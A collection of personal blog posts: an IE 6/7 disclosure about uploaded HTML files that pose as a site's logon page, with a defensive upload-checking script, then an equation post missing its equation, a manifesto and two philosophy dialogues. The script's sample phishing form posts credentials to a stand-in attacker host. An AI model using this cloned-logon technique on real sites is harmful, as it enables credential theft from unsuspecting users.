Vulnerability in Windows Internet Explorer 6 & 7

Almost a month ago, I reported this vulnerability to Microsoft, and they came back and confirmed it was a problem, but then came back and said “It’s no big deal, we’ll fix it in the next release”.

Microsoft has this track record with me of saying “It’s no big deal”, and then later making it a big deal, and never giving me credit for helping them. So I told them I was bringing this one public if they really thought it was no big deal, then no harm done… – they never asked me not to…

So I tried posting it to bugtraq – 24 hours after my first post didn’t show up, I reposted with a second account, thinking that the first post was blocked because I used an email address that wasn’t subscribed – almost 15 hours later, and the second post hasn’t shown up – I’m beginning to wonder if someone is blocking the post (for whatever reason).

I emailed the list owner, and after about 18 hours there has been no response… so I guess it’s up to me to just start posting the problem around on the internet to get the word out.

I’ve tried posting this thread on two different security forums, and each forum throws an exception and doesn’t let me post… I think the world is out to squash Microsoft Internet Explorer vulnerabilities… at least I can post here!

Based on the description I’ve come up with so far, this vulnerability may have limited destructive power, because it requires both the server owner and the client user to practice poor security habits – but isn’t that what the world is filled with, people who don’t practice safe security habits? It is also possible that someone with more time on their hands can come up with other variants that are a bit more destructive.

Web application scenario:

1. Website accepts file uploads from users
2. Website follows recommended security for file uploads, including two practices that matter for this discussion:
   a. The uploaded document is not stored in a directory accessible to web users (it is served by a back-end process when a user requests it)
   b. Users do not have execute permissions on the documents stored on the server (only the permissions granted for download)

Attack scenario:

1. Attacker uploads an HTML file to the site
   a. This HTML file contains:
      i. A copy of the website’s logon form, including relative paths back to the website for cascading style sheets, images, etc.
      ii. A modified form post location, so the form posts to a site the attacker controls
2. The website gives other users, according to their authorization, the ability to download and view the HTML file the attacker uploaded

IE response:

1. Authenticated users click on the HTML file and are presented with the download popup; the file is streamed from a repository other than a web-accessible location on the server
2. When prompted, users choose “Open” from the download popup, allowing the default application to open the downloaded file
3. IE opens the HTML page in the current IE window (verified against both IE 6 and IE 7), but does not change the security zone or the URL in the address bar, so the user now sees the (modified) logon page of the site, with no indication (apart from opening and reviewing the source code) that this page is not hosted on the site they are visiting
4. IE, treating the HTML page as if it had been served by the remote site in the normal use case, also resolves all relative paths (cascading style sheets, images, etc.) against the server
5. User – while thinking it odd that they are being prompted to log on again – looks and sees they are still in the same security zone, with the URL of their trusted website
6. User logs on again (sending credentials to the attacker), and the attacker does anything he wants with the post (serve up the actual file, redirect back to the original site, etc.)

Contrast IE’s response to FireFox’s response.

FireFox response:

1. Authenticated users click on the HTML file and choose to download; when prompted, users choose “Open” for the HTML file, allowing the default application to open the downloaded file
2. The default browser (or an alternate browser) opens the HTML page from the local internet cache after the download completes
3. The browser does not resolve relative paths, and the URL changes to show it is running from a local location
4. The attack is obvious; the user doesn’t proceed.
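One way a site operator can reduce exposure to the scenario above, as an added example that is not part of the original post: reject uploads whose content sniffs as HTML (not just by extension), flag forms that post off-site, and stream stored files with headers that ask the browser to save rather than render. Function names are hypothetical and the sample uploads are constructed; the two X- headers are honoured by later IE versions, not IE 6/7.

```python
"""Server-side checks for user-uploaded documents.

Added example for the scenario above; not code from the original post.
Function names are hypothetical and the sample uploads are constructed."""
import re
from typing import Dict, List, Tuple
from urllib.parse import urlparse

# Constructed sample uploads: an innocuous text file and an HTML file that
# mimics the site's logon form but posts to an attacker-controlled host.
SAFE_TEXT = b"Quarterly report\nRevenue up 3%\n"
PHISH_HTML = (b'<html><head><link rel="stylesheet" href="/css/site.css"></head>'
              b'<body><form action="http://attacker.invalid/collect" method="post">'
              b'<input name="user"><input name="pass" type="password"></form></body></html>')

# Markers a browser's content sniffer treats as markup; checked in the leading
# bytes so a ".txt" or ".doc" extension does not disguise an HTML payload.
_HTML_MARKERS = re.compile(rb"<!doctype\s+html|<html|<head|<body|<script|<form|<iframe", re.I)
_FORM_ACTION = re.compile(rb"<form[^>]*\baction\s*=\s*[\"']?([^\"'\s>]+)", re.I)
_HTML_EXTENSIONS = {"html", "htm", "xhtml", "shtml", "mht", "mhtml"}


def looks_like_html(data: bytes, window: int = 1024) -> bool:
    """True when the file's leading bytes would render as HTML regardless of its name."""
    return _HTML_MARKERS.search(data[:window]) is not None


def external_form_actions(data: bytes, own_host: str) -> List[str]:
    """Form targets that post to a host other than own_host (the credential sink)."""
    hits = []
    for m in _FORM_ACTION.finditer(data):
        action = m.group(1).decode("latin-1", errors="replace")
        host = urlparse(action).hostname
        if host and host.lower() != own_host.lower():
            hits.append(action)
    return hits


def classify_upload(filename: str, data: bytes, own_host: str) -> Tuple[str, str]:
    """Decide whether to store an upload: returns (verdict, reason)."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext in _HTML_EXTENSIONS:
        return "reject", "html extension"
    if looks_like_html(data):
        targets = external_form_actions(data, own_host)
        reason = "content sniffs as html"
        if targets:
            reason += "; form posts off-site to " + ", ".join(targets)
        return "reject", reason
    return "allow", "ok"


def download_headers(filename: str) -> Dict[str, str]:
    """Headers for streaming a stored document back to the user.

    Octet-stream plus an attachment disposition asks the browser to save rather
    than render. The two X- headers are honoured by later IE versions (not 6/7):
    nosniff stops content sniffing, noopen removes "Open" from the download dialog."""
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename)
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "X-Download-Options": "noopen",
    }


if __name__ == "__main__":
    for name, blob in (("report.txt", SAFE_TEXT), ("report.txt", PHISH_HTML)):
        print(name, classify_upload(name, blob, "www.example.test"))
    print(download_headers("my report.html"))
```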

Perhaps I’ve missed something that makes this of no use to an attacker, and perhaps I’ve missed something that makes this an even bigger problem than I realized – but none-the-less, here it is.

r/Darth Jedi

James – here is your equation for your number sequence…

Let x equal the last number in the sequence

Let (the function of) F(x-1) equal the number right before the last number in the sequence

Let (the function of) F(x-2) equal the number before the number right before the last

Let a = ((x)-(F(x-1)))

Let b = (F(x-1)) - (F(x-2))

Let c = the position of x in the sequence

Let d and e be a place holder for calculations

Let f = the next number in the sequence

So the equation is:




I’m sure there is a much more elegant way to write this out, but when I laid down in bed last night it popped into my head right before I fell asleep, so I figured I’d post it as a blog – so you could see it once you added me as a friend…

My Manifesto

From an early age, long before I was introduced to ideas like Descartes’ Method of Doubt, it has been my life’s goal to constantly question my own beliefs, question the teachings I was given as a child, and search for truth.

This quest has brought a lot of trouble and heartache into my life. Walking away from convictions that your friends and family hold to be true, because they are unsupportable and irrational, can be a dark and lonely road, and yet, as Martin Luther stated when standing before the Church fathers at the Diet of Worms: “Unless I am convinced by holy scripture, or by evident reason… I cannot and will not recant, because acting against one’s conscience is neither safe nor sound” (Oberman, 2006).

Regardless of the problems in my life that the love of knowledge has caused, with this relentless drive in the pursuit of knowledge comes a greater appreciation and an awakened beauty, for each and every new concept that comes through and knocks down my world as I know it. As I grow and grasp, I am left with the sense of waking up on a summer’s morning inside of a hot and stuffy tent, unzipping the door and stepping out into fresh sunlight and to indescribable sights and sounds.

I will never cease to be awestruck through, in and around the world as it exists – I shall cling to the reformation motto of “Semper Reformanda” – and hope there never comes a time in my life that I am not ready, able and willing to learn and grow.

Philosophy to me is the foundation of my existence.

Dialogue on the problem of suffering

Once again, another philosophy assignment; who knows if anyone will read it, but I’m posting it anyway. 🙂

Joan: You know, Confucius, I’ve been thinking about your very first thought a little earlier in our conversation today; that humans “survive in adversity and perish in ease and comfort”. This statement really reminds me of one of my favorite movies, The Matrix. Do you remember The Matrix?

Confucius: Yep! Great movie! It was all about how humanity, while good, deep down inside needs to be challenged with difficulties. I loved it when the Oracle told Neo (who I believe to be an archetype of humanity itself) that he could only be truly free to save the world if he felt he was free to save the world. She compared his knowing if he was the one, to being in love: You either know it or you don’t. Of course, in the second movie we found out that the oracle told Neo exactly what he needed to hear to get him to go out and face his adversity to become a better person. So Neo had to be challenged with difficulties to become a better person.

Joan: You know, that’s an interesting take on the movie, but my take is a bit different. I think Neo had to do a lot of soul searching, he had to grow as an inner person, to experience love for another human being, to put his life on the line for that human being, so that adversity didn’t give him personal growth – it gave him spiritual growth.

Confucius: Hmmm, well we clearly disagree on that facet of the movie.

Joan: But that’s not really my point of bringing it up. Back at your original statement that humanity “survives in adversity and perishes in ease and comfort”, that reminds me of something Agent Smith said in that movie:

Joan mimics that articulation and drawl of Agent Smith: Did you know that the first Matrix was designed to be a perfect human world? Where no one suffered, where everyone would be happy? It was a disaster. No one would accept the program. Entire crops were lost. Some believed we lacked the programming language to describe your perfect world. But I believe that, as a species, human beings define their reality through suffering and misery. The perfect world was a dream that your primitive cerebrum kept trying to wake up from. Which is why the Matrix was redesigned to this: the peak of your civilization (Wachowski & Wachowski, 1999).

Confucius: I guess I would agree with that; suffering produces the appropriate foundation for humanity to grow from existence to essence; I don’t think humanity could come to fully understand and appreciate its essence without first experiencing existence (and associated suffering), and therefore I don’t think mankind could be truly happy without some form of suffering.

Joan: You sound a bit like an existentialist!

Confucius: I say… I do!

Joan: Confucius says, he does!

Aquinas: Haha! I get it!

Job: But seriously though, both of you are splitting hairs really. You both believe that suffering is done to produce a certain result in those that are suffering. How would you respond to those people that say that there are cases of needless and pointless suffering in the world? It seems to me that you can’t really speak to, and answer the question of suffering until you have walked a mile in someone’s shoes; that is, until you have undergone unnecessary suffering, how can you speak to the problem of suffering?

Aquinas: Ok, Job; let’s hear what you have to say.

Job: Well, everyone knows my story. One day, I was sitting in the shade of my tent during the noonday glare, sipping a cup of tea, when all of a sudden one of my servants came to me and told me that all my oxen and donkeys were plundered, and all my servants that were working the fields were killed, except the one that came to report to me.

Joan: Wow, that must have been really hard – that was your entire livelihood, wasn’t it?

Job: Nope, nah, I still had sheep. However, while my servant was still speaking, another came running in to tell me that in another section of my farmlands a fire from God fell from the sky burning up my sheep and servants, and only he escaped to tell me.

Confucius: Confucius says that really sucks.

Aquinas: Ok there buddy, it was funny the first time, don’t overdo it.

Joan: Wow, so then that was your entire livelihood?

Job: Nope, I still had my camels. And yet, while the second servant was still talking a third came hurrying from a third corner of my farmlands to tell me that the Chaldeans had raided and took all my camels and had killed all my servants attending them, and he only escaped.

Joan: And that was it?

Job: That was it. And yet, I realized that God had given me everything that I owned, that He had provided those things of material value to me to begin with; so they were rightfully His, if he wanted to take them away, then so be it.

Aquinas: But that’s not all is it?

(Job begins to get teary, apparently wanting to leave this part out of the story)

Job: No, at that same exact time, another messenger came in to tell me that all my sons and daughters had just been killed when my oldest son Fletcher’s house collapsed.

Joan: Oh God!

Job: That was my response.

(Job pauses to catch the lump that began to form in his throat from holding back the tears)

Job: I immediately went into deep mourning and cried out to God saying: “Naked I came from my mother’s womb, and naked I will go back into the womb of the earth. God gives, and God takes. Blessed is God’s name.”

(Silence falls over the entire room, until Aquinas finally begins to speak)

Aquinas: I still can’t imagine what it must have been like; even hearing you talk about it now.

Job: Yes, but that wasn’t all, as if there couldn’t have been anymore insult to injury, a short while later I developed sores, ulcers and scabs that covered me from head to foot.

Joan: Wow, what did you do?

Job: What could I do? My wife told me to stop holding onto my integrity and to curse God and die. But I was, and still am a solid believer in the fact that if we can accept the good things that God gives to us, we must also accept the bad things that God gave to us as well.

Confucius: But, what was the purpose of it all?

Job: Well, let me finish my story (it’s one of the number one sellers; my agent is ecstatic!). My so-called friends came around to try and comfort me.

(Job takes on a sarcastic tone)

Job: And what comfort they were. Mostly they just tried to convince me as to why all of this was probably my fault that God was punishing me for something that I had done, and probably just didn’t remember.

(Job sighs)

Job: I was upset with God, I really was. I mean, I was accepting of his decision, but I really wanted the ability to defend myself to God, and tell him why I was innocent and not guilty, and why I shouldn’t be punished.

(There is a slight pause, and Job shudders)

Job: And then, there came the answer.

Joan: You mean, God told you the reason for all of your suffering?

Job: Heck no! He stood me up in the middle of a violent storm, and told me to stand up straight, to brace myself, and listen to what He had to say and answer Him if I could. He put me to shame by showing me that I can’t even fathom some of the smallest portions of His creation, so who am I to question his goodness, mercy, judgment and righteousness. In the end, God’s only answer to me was God Himself.

Aquinas: Amen to that. You know Joan, Paul said the same thing in his letter to the Romans. I think it’s interesting that Job’s “book provides no answers to these questions. In the end, the reader is in the same position as Job himself. But in the end, the reader’s questions must be handled in the same way that God handled Job’s questions. For like Job, we were not there when God laid the foundations of the earth. None of us knows who marked off its dimensions or stretched a measuring line across it.” (Frame, 1994)

Joan: So really though, is it that God wants us to mature spiritually?

Confucius: Or does he want us to grow as a person?

Aquinas: I think the problem here is, as John Frame points out in his book Apologetics to the Glory of God, that we are not being theocentric in our view of the problem of evil; rather we are being anthropocentric, and of course, that’s natural for us, as we see things from man’s point of view and not God’s. But what I think we need to understand is that God not only wants the greatest good for us, but He knows the greatest good for us too!

Job: This sounds like the greater-good theodicy!

Aquinas: In a way, but even deeper than that. I want each of you to go to and order the John M. Frame book that I’m mentioning, and read the chapters on the problem of evil. There is too much to explain right here, right now, but I will give you a quick overview.

(Keyboard clicking is heard in the background)

Aquinas: Just wait, please pay attention, Amazon isn’t going anywhere. In his book, John Frame says that we need to look at the problem of pain from a historical perspective.

First, we need to understand the past; and see that the past shows that God is good, merciful and just, and while we might not see the forest through the trees as we’re walking along in our life, God never takes his eyes off of us.

Next, we need to take a present view of pain and suffering, Paul tells us in Romans that God never allows any evil to come about to anyone who loves him, without it working for the greater good.

And finally, we have to take a future view of pain and suffering. There are still, and will continue to be outstanding questions on the goodness and mercy and justice of God, because we can’t see the end of everything. But, God has continued to show, over and over historically that He indeed will take care of us, if we love and trust Him, if we have Faith in Him.

Job: And that’s why I said that God’s answer to the problem of pain and suffering is Him. He says, I AM who I AM, trust me and have faith.

Aquinas: This I believe answers the question, in the end, to have faith in God is to have the answer to the question. I think it also starts to touch on the question of “Why the God Man”, but we’ve run out of time for today. I think I’ll write a book on that topic, it sounds very interesting.

Confucius: I think Anselm already beat you to that…

Joan: Confucius says…

Job: For crying out loud, I have to go, I’ll catch up with you guys later.

Aquinas: Ok, later!

Joan: Don’t forget dinner on Friday night!

Confucius: (Speechless)

Works Cited

Frame, J. M. (1994). Apologetics to the Glory of God. Phillipsburg: Presbyterian and Reformed Publishing Company.

Wachowski, A., & Wachowski, L. (Directors). (1999). The Matrix [Motion Picture].

Dialogue – Is Truth Relative?

This discussion takes place between three friends, following up on a discussion they had before dinner at the local pizza parlor.

Yang: Man, I’m really glad I’m full; it’s really hard to think on an empty stomach!

Paula: I agree!

Yang: That Pizza place is the best! There really is no other place that makes pizza as good as they do!

Paula: I disagree. I think that the pizza place on the other side of town is much, much better.

Mel: I think you’re both wrong; there is no better place than the little store we used to go to, when I was a kid. It’s still in business too; only it’s about 7 hours from here, so I don’t get to enjoy the pizza that often.

Paula: Once again, we see that beliefs are relative to the individual.

Yang: Paula, now that my hunger is satisfied I would like to pick back up where we were before dinner. But, this time, let’s get a little more serious. Before dinner we all came to the conclusion that beliefs are person relative, that is, each person holds their own belief, but that beliefs can also be true and objective.

Paula: Yes, I agreed to that, but I was hungry, and I just wanted to get something to eat, and I know you Yang, if I hadn’t agreed with you, you would have had us talking about it all night. You see, I still maintain, and want to underline that while beliefs are person relative, most truths are too.

Yang: If you are to take that position Paula, who is to say that your truth that states that most truths are relative isn’t itself relative? Then we’re right back to where I said we would be at the beginning: If a truth is relative, then it could be false, and a truth cannot be both true and false at the same time in the same way; that violates the law of non-contradiction, so a truth is either true or false, but it can’t be both true and false.

Paula: See, that’s where we disagree; it’s not both true and false at the same time and in the same way, it’s different to each individual. It would only be true or false at the same time in the same way if truth was objective, which is a position that, by and large, I don’t support.

Mel: That’s a pretty interesting view Paula. Perhaps you can help Yang out, by defining what you believe truth is.

Paula: Well, I think truth is in the eyes of the beholder, for the most part. I mean, as you pointed out a while ago Professor, from your perspective, it is true that the moon is shining, but from a scientist’s perspective, the moon isn’t really shining, but it is reflecting.

Mel: Very good observation!

Paula: So, while you used that statement as an example of something that is objectively true, in reality it was subjectively true. So while you can say, from your perspective that the moon is shining, a scientist could just as rightly say, that it isn’t really shining, but it is reflecting.

Yang: But Paula, now you’re the one who is playing games with words and puzzles. If Mel had said: “It appears like the moon is shining tonight”, then that would be objectively true.

Paula: And yet, his statement would be person centric. If I was blind, I couldn’t agree with his statement that it appears like the moon is shining.

Yang: Ok, so what if Mel said: “It appears to me that the moon is shining”

Mel: Paula is right, this still suffers from the same problem, it is a statement that is obviously tied to my perception, and so does it not therefore seem to be relative to me?

Sophia: Hey Yang, Paula, Mel, how’s it going?

Mel: We’re doing well, except we’re in a pretty deep discussion about whether or not there is such a thing as objective truth.

Sophia: Wow that is deep!

Paula: Yes, but I think we were just about to wrap it up. We just agreed that any statement that I make is obviously tied to my perception, and because my perception is relative to me, then, any truth that I state is relative to me. And as a result, any truth that you state is also relative to you. So, because all truths are put forth by people, then truths are all relative, depending on the person that put it forth.

Sophia: Well, that is very interesting. Mel, what do you think about this statement that Paula just made?

Mel: It definitely has some truth to it!

Yang: Do you mean it definitely has some truth in it for everyone, or for just you? For me, it still doesn’t ring true, and if all truth is relative, that means, it isn’t true, because I say it isn’t!

Paula: Don’t start that again!

Sophia: Mel, let me ask you this question. Do you believe in God?

Paula: Mel already said yes.

Mel: Yes, I do, and I believe that this is a person-centric belief, but that it can also be true.

Paula: But how do we measure truth, except through perception, which is person centric, and therefore relative?

Sophia: Just a minute, let me continue. Mel, you believe in God, right? Now let me ask you this, does your belief in God make God real? What I mean is, if God isn’t real, can your belief in Him make Him become real?

Paula: Well, to Mel, He could be real or not real depending on whether Mel believes He is real.

Sophia: That’s not my question. Can Mel’s belief make God real, in actuality?

Yang: No, God either exists in actuality or doesn’t exist in actuality. What you believe about it is inconsequential.

Sophia: So, could we say, whether God exists or not, is an objective truth. Again, what I mean is that if God exists, then He exists in actuality, and if He doesn’t exist, then He doesn’t exist in actuality. And therefore, God’s existence is either objectively true, or objectively false, but either way, it’s objective. It doesn’t matter what your belief is on this question, it is either true in actuality or not true in actuality.

Mel: Yes, that’s a great point. So, at least in the case of God, there is objective truth as to whether He exists or not.

Sophia: Paula?

Paula: Ok, I see what you’re saying; my belief about the existence of God, while being subjective to me, in reality is being held to a standard of truth that is outside of me, that is, it is being held to actuality?

Sophia: Exactly!

Mel: What if we don’t agree on what God is?

Yang: Oh brother, here we go again.

Paula: Seriously though, aren’t we then tied to our perception of God to answer this question? And we’ve already stated that perception is person-centric; so therefore the answer of the belief of God is relative to the person answering the question. I could think God is a tree, or a spirit, or a word, or a breath, or I could define God as that which doesn’t exist, so then my definition of God, is that which doesn’t exist.

Sophia: Ok, let’s get even more basic. I say that I have a rock in my hand.

(Sophia holds up her hand)

Now, let’s vote, who thinks that I have a rock in my hand?

Mel: I do.

Yang: I don’t.

Paula: I don’t either.

Sophia: Ok, so, does whether you believe that I have a rock in my hand or not change the fact that I have a rock in my hand or not? Can your belief, person-centric as it is, affect actuality?

Paula: No, I suppose not, so then we’re right back to the same point we were at right before dinner, all belief is subjective, but some belief is true.

Yang: I think there is one important thing we have learned though….

Paula: What’s that?

Yang: Well, for one thing, there is at least one truth that is objectively true, so we can certainly no longer say that “All truth is relative”.

Paula: Yes, but I would still say that most truth is relative.

Sophia: However, let me change my last question to be a little different, and let’s see how your answer might change. Let’s say, for argument’s sake, that I am omniscient, that is, I know everything. Now, ask me a question, any question!

Yang: Is there such thing as objective truth?

(Yang gets this evil grin on his face)

Sophia: Tricky, tricky! Ok, so that’s your question, “Is there such thing as objective truth”. Now, answer your own question, please.

Yang: I still say there is.

Mel: I’m pretty sure there is.

Paula: I don’t think so.

Sophia: Now here is the catch, all three of you have your beliefs, and yet, in order to have your beliefs, you must presuppose that your belief is valid on each other. Yang, if you say that there is objective truth, then you are binding Paula with that statement. Paula, even when you say there is no objective truth, you are binding Yang to that statement, by saying that Yang can’t hold you to an objective standard, because there is a standard that says there is no standard. So, in either case, you are both asserting there is an objective truth that stands outside of your person-centric perception. In order to argue whether there is objective truth or not, you both need to appeal to something outside of yourself.

Paula: Wow, I guess I never really thought of it that way.

Mel: So what you are saying is, the fact that we are arguing as to whether or not there is objective truth means that we are appealing to something outside of ourselves as the arbitrator to the answer of the question of objective truth?

Sophia: Exactly right. And here is the final thing to leave you to think about. I am not going to tell you whether or not I have a rock in my hand. So while there is an objective truth, each of you will continue to believe what you believe based on your own person-centric perception.

Paula: So, to sum up what you are saying: There is such thing as an objective standard for everything, but, as humans that rely on our perceptions, we may not be able to always understand or articulate what that objective truth is?

Sophia: You’ve got it.

Yang: So, someone out there knows the best pizza place then!

Paula: You are a piece of work….
